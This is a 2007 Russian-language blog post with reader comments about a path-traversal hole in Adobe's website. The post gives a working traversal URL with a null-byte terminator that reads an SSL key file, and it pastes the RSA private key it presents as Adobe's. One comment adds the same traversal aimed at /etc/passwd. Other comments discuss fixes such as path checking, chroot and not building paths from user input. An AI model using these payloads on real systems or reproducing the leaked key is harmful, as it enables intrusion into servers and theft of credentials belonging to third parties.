Войти в систему

Home
    - Создать дневник
    - Написать в дневник
       - Подробный режим

LJ.Rossia.org
    - Новости сайта
    - Общие настройки
    - Sitemap
    - Оплата
    - ljr-fif

Редактировать...
    - Настройки
    - Список друзей
    - Дневник
    - Картинки
    - Пароль
    - Вид дневника

Сообщества

Настроить S2

Помощь
    - Забыли пароль?
    - FAQ
    - Тех. поддержка



Пишет mumuntu ([info]mumuntu)
@ 2007-09-26 19:42:00
Previous Entry  Add to memories!  Tell a Friend!  Next Entry
Настроение:Хакер Хэлл
Музыка:придет и за вами

Показали сейчас отличное.
Заходим сюда: http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../..//usr/local/apache/conf/ssl.key/www.adobe.com.key%00.
И видим вот что:

-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQC+gu/eSRi5ThbYrVQcewZFQc/Kfa8B/gKOKzD98aY9hvNFj3pd
w5kw+dSlOCU78jrGkbP4m0GyNN27zDAQlWPEkmyzrOqBYvLnWFQ2kTzPlMBNt2yd
F5TsXqCJvqbwvTn+ExBxvBQyoYpdjl37sk9cyqqAVtavbx1UL5956EWW5wIDAQAB AoGATkxUN2CFd8tfWmhKVHY/ioFU3F0xazkxZarctNH3R/xJyYIBgb3dHSLgwZLE
wtF4VJoXhIqSwqI1q3RtILO1T6OioXVRPsHOZZCB0SV+67Qk0/ukm9rftQUJ95Jx v4oM4pugVZieScQ3eZaShT0JumjMd3+dQybkJx6iHQ9wO1ECQQDywfyHvZ6Oa45X
cjOHIGHBDd3kXyJdVjxljtELO0tv2qPYw6UCAdQxjA5Zit+2tCrOVNZx1Y0woUdH
A7DG0KGpAkEAyOdaM9pXB7Bw5fjuIH5BaZXT1ZgdY90nlnYq00kbZVaj5CS8mTAQ
/brK0dOAM3a0KXP4YXw++WxIV2h+WFnuDwJBAKMgVdjFQ/HCNtFuTU/lI6s97TiT
8Ry1YTqBgNnCS4vraSS1O4Ggxv1QdygWmQRGB2nFOqEd9pWSGrqOsVC4S5kCQQDF
xuOI6mgE3NC3xNB/0msIy4On4UEFn6CqQZg1OeIraBidrwCveZ8weaPS3nh1sWT4
7f7V0V+ZYdzxl5/R0G5HAkAzMm0Rs6TOIuUvKAPH0YWkbzyTNzIsMUlf2plbFko3 KE1w2vwntoaGaZu366ZE9B+GlunvZsR8o0gBtnNc8rur
-----END RSA PRIVATE KEY-----

То есть, ни что иное, как закрытый ключ компании Adobe.
Ничего ребята работают, молодцы.


(Читать комментарии) - (Добавить комментарий)


[info]alexshubert@lj
2007-09-26 12:42 (ссылка)
я криворукий. мне не отдает.

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]blacklion@lj
2007-09-26 13:23 (ссылка)
http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../..//etc/passwd%00
Но мне уже тоже не отдают :)
А ключ — до сих пор отдают. Т.е. фиксят что ли прямо щас?

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]alexshubert@lj
2007-09-26 13:40 (ссылка)
а почему нельзя проверять путь на .. и на ./? Конечно, включая всякие коды для этих же последовательностей?

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]blacklion@lj
2007-09-26 14:02 (ссылка)
Какой-то нелепый вопрос. Конечно можно проверять. Но это классический баг — не проверять.

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]alexshubert@lj
2007-09-26 14:10 (ссылка)
Я нечаянно стер первую часть поста.
*глядя на то, как долго они закрывают дыру по частям*

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]blacklion@lj
2007-09-26 14:18 (ссылка)
А. Ну фиг их знает. Вот, говорят совсем закрыли.

(Ответить) (Уровень выше)

нефига не баг
(Анонимно)
2007-09-27 02:12 (ссылка)
пермишенами разруливать надо
ваще прилага из chroot'а запускаться должна, что бы такого сделать нельзя было

(Ответить) (Уровень выше)


[info]vap@lj
2007-09-26 14:33 (ссылка)
Имхо, нормальное решение - в принципе не формировать путь из пользовательских данных, даже с проверками.
Иначе где-нибудь рано или поздно таки подловят.

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]oas@lj
2007-09-26 18:45 (ссылка)
Зато типа спорт и соревнование умов.

(Ответить) (Уровень выше)

(Читать комментарии) -